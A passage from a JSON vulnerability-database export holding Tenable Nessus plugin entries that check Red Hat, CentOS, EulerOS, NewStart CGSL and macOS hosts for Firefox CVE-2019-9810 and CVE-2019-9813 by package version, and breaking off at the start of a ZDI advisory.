information\n(CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0672\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-9810\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-9813\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0672\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"firefox-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"firefox-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", 
reference:\"firefox-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"firefox-debuginfo-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"firefox-debuginfo-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"firefox-debuginfo-60.6.1-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:29:49", "description": "An update for firefox is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-02T00:00:00", "title": "CentOS 7 : firefox (CESA-2019:0671)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:firefox"], "id": "CENTOS_RHSA-2019-0671.NASL", "href": "https://www.tenable.com/plugins/nessus/123558", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0671 and \n# CentOS Errata and Security Advisory 2019:0671 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123558);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2020/02/18\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"RHSA\", value:\"2019:0671\");\n\n script_name(english:\"CentOS 7 : firefox (CESA-2019:0671)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2019-April/023257.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7077c31f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9810\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"firefox-60.6.1-1.el7.centos\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:58:08", "description": "According to the versions of the firefox package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Mozilla: IonMonkey MArraySlice has incorrect alias\n information (CVE-2019-9810)\n\n - Mozilla: Ionmonkey type confusion with __proto__\n mutations (CVE-2019-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-29T00:00:00", "title": "EulerOS 2.0 SP2 : firefox (EulerOS-SA-2019-1570)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2019-05-29T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:firefox", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1570.NASL", "href": "https://www.tenable.com/plugins/nessus/125497", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125497);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2019-9810\",\n \"CVE-2019-9813\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : firefox (EulerOS-SA-2019-1570)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the firefox package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Mozilla: IonMonkey MArraySlice has incorrect alias\n information (CVE-2019-9810)\n\n - Mozilla: Ionmonkey type confusion with __proto__\n mutations (CVE-2019-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1570\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5e656b23\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"firefox-60.6.1-1.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg, allowmaj:TRUE)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:03:04", "description": "The remote NewStart CGSL host, running version MAIN 4.06, has firefox packages installed that are 
affected by multiple\nvulnerabilities:\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. This vulnerability\n affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and\n Thunderbird < 60.6.1. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write. This\n vulnerability affects Firefox < 66.0.1, Firefox ESR <\n 60.6.1, and Thunderbird < 60.6.1. (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-08-12T00:00:00", "title": "NewStart CGSL MAIN 4.06 : firefox Multiple Vulnerabilities (NS-SA-2019-0095)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2019-08-12T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0095_FIREFOX.NASL", "href": "https://www.tenable.com/plugins/nessus/127318", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0095. 
The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127318);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_bugtraq_id(107548);\n\n script_name(english:\"NewStart CGSL MAIN 4.06 : firefox Multiple Vulnerabilities (NS-SA-2019-0095)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 4.06, has firefox packages installed that are affected by multiple\nvulnerabilities:\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. This vulnerability\n affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and\n Thunderbird < 60.6.1. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write. This\n vulnerability affects Firefox < 66.0.1, Firefox ESR <\n 60.6.1, and Thunderbird < 60.6.1. (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0095\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL firefox packages. Note that updated packages may not be available yet. 
Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL MAIN 4.06\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 4.06');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL MAIN 4.06\": [\n \"firefox-60.7.0-1.el6.centos\",\n \"firefox-debuginfo-60.7.0-1.el6.centos\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:21:57", "description": "The version of Firefox installed on the remote macOS or Mac OS X host\nis prior to 66.0.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-09 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. 
(CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-22T00:00:00", "title": "Mozilla Firefox < 66.0.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MACOS_FIREFOX_66_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/123011", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-09.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123011);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/31\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-09\");\n\n script_name(english:\"Mozilla Firefox < 66.0.1\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox installed on the remote macOS or Mac OS X host\nis prior to 66.0.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-09 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. 
(CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox version 66.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nis_esr = get_kb_item(kb_base+\"/is_esr\");\nif (is_esr) exit(0, 'The Mozilla Firefox installation is in the ESR branch.');\n\nmozilla_check_version(version:version, path:path, product:'firefox', esr:FALSE, fix:'66.0.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2020-06-22T11:42:10", "bulletinFamily": "info", "cvelist": ["CVE-2019-9810"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of Array.slice when executed within JIT compiled code. By performing actions in JavaScript, an attacker can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-04-15T00:00:00", "id": "ZDI-19-364", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-364/", "title": "(Pwn2Own) Mozilla Firefox Array.slice 